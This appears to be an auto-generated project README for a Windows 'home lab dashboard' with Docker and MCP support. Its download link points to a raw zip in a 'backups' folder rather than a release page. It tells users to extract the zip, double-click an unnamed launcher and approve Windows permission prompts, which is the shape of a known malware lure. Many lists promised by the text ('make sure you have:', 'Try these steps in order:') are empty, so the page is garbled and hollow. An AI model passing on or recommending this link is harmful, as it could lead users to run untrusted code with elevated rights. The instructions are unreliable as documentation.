Visit this page to download the Windows release:
Download HomeLab_Dashboard_MCP_Integrated
HomeLab_Dashboard_MCP_Integrated puts your home lab tools in one place. It gives you a single dashboard for everyday use, with sign-in, HTTPS, Docker support, and offline use.
It is built for people who want to open one screen and reach their services without juggling many tabs. It can also connect with agentic AI tools through MCP, so you can link your dashboard with local AI apps when you want that setup.
Before you install, make sure you have:
If you plan to run it fully offline later, set it up once while you still have access to the release files and any needed images.
Follow these steps on Windows:
Open the download page: https://raw.githubusercontent.com/CodeBy-red/HomeLab_Dashboard_MCP_Integrated/main/backups/Integrated-MC-Home-Lab-Dashboard-preredemption.zip
Find the latest release.
Download the Windows package from that release. If there are more than one file, pick the one meant for Windows.
Save the file to a folder you can find, such as Downloads or Desktop.
If the download comes as a ZIP file, right-click it and choose Extract All.
Open the extracted folder.
Look for a file such as start.bat, run.bat, or a similar launcher.
Double-click the launcher to start the dashboard.
If Windows asks for permission, choose Yes.
Wait for Docker to start the services.
Open your browser and go to the local address shown by the app, such as http://localhost:3000 or https://localhost:8443.
This app is set up for secure access. In a normal setup, you may use:
If your setup includes a login screen, use the account details from the release instructions or your own home lab settings.
If you run this for a family or small team, set up one clear admin account first. Then add other users as needed.
The app is built to use HTTPS. That means your browser can connect over a secure link.
In most setups, the app will:
If Windows shows a browser warning for a local certificate, this can happen with private home lab tools. Use the certificate method included in your release package if one is provided.
This project uses Docker Compose. That means the app runs as a set of containers instead of one large install.
You may see files such as:
docker-compose.yml.envcaddy config filesTo start the app, the launcher usually calls Docker for you. If you prefer command line use, you can open a terminal in the app folder and run the compose file from there.
A typical flow looks like this:
This dashboard can work with agentic AI tools through MCP, which stands for Model Context Protocol.
In plain terms, that means the dashboard can connect to local AI services and give them a way to work with your home lab tools.
Common pairings include:
You do not need to use the AI parts right away. The dashboard can run as a normal home lab front end on its own.
Use this app to manage things like:
It works well when you want:
This project can run without the internet after setup. That makes it a fit for:
For offline use, make sure you have:
If the app does not open on the first try, check these items:
If the dashboard opens but some tiles fail, the linked service may not be running yet.
Your release folder may include:
README.mddocker-compose.ymlstart.batstop.bat.envLeave these files in place unless your release notes say to change them.
After the first start:
If you run more than one service, keep the dashboard tab pinned in your browser for quick access.
This app is made for:
Try these steps in order:
If a login page appears but does not accept your sign-in, check the account details from your setup files or release notes.
Download the Windows release here:
Once the app is running, you should see a web dashboard that acts as your main page for home lab tools. From there, you can open linked services, manage access, and keep everything in one place on your local network